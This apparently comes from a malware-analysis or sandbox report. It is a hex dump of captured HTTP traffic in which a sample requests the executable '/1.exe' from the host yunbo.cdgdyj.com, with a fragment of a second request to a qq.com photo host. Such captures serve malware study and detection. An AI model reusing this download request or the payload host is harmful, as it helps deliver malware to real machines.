0x00000100 (00256)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f312e65 78652048 5454502f   GET /1.exe HTTP/
0x00000010 (00016)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000020 (00032)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x00000030 (00048)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x00000040 (00064)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000050 (00080)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000060 (00096)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000070 (00112)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000080 (00128)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000090 (00144)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000a0 (00160)   2079756e 626f2e63 64676479 6a2e636f    yunbo.cdgdyj.co
0x000000b0 (00176)   6d0d0a43 6f6e6e65 6374696f 6e3a204b   m..Connection: K
0x000000c0 (00192)   6565702d 416c6976 650d0a0d 0a6c6976   eep-Alive....liv
0x000000d0 (00208)   650d0a0d 0a434c52 20322e30 2e353037   e....CLR 2.0.507
0x000000e0 (00224)   3237290d 0a486f73 743a2072 6177746a   27)..Host: rawtj
0x000000f0 (00240)   2e70686f 746f2e73 746f7265 2e71712e   .photo.store.qq.
0x00000100 (00256)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....


Strings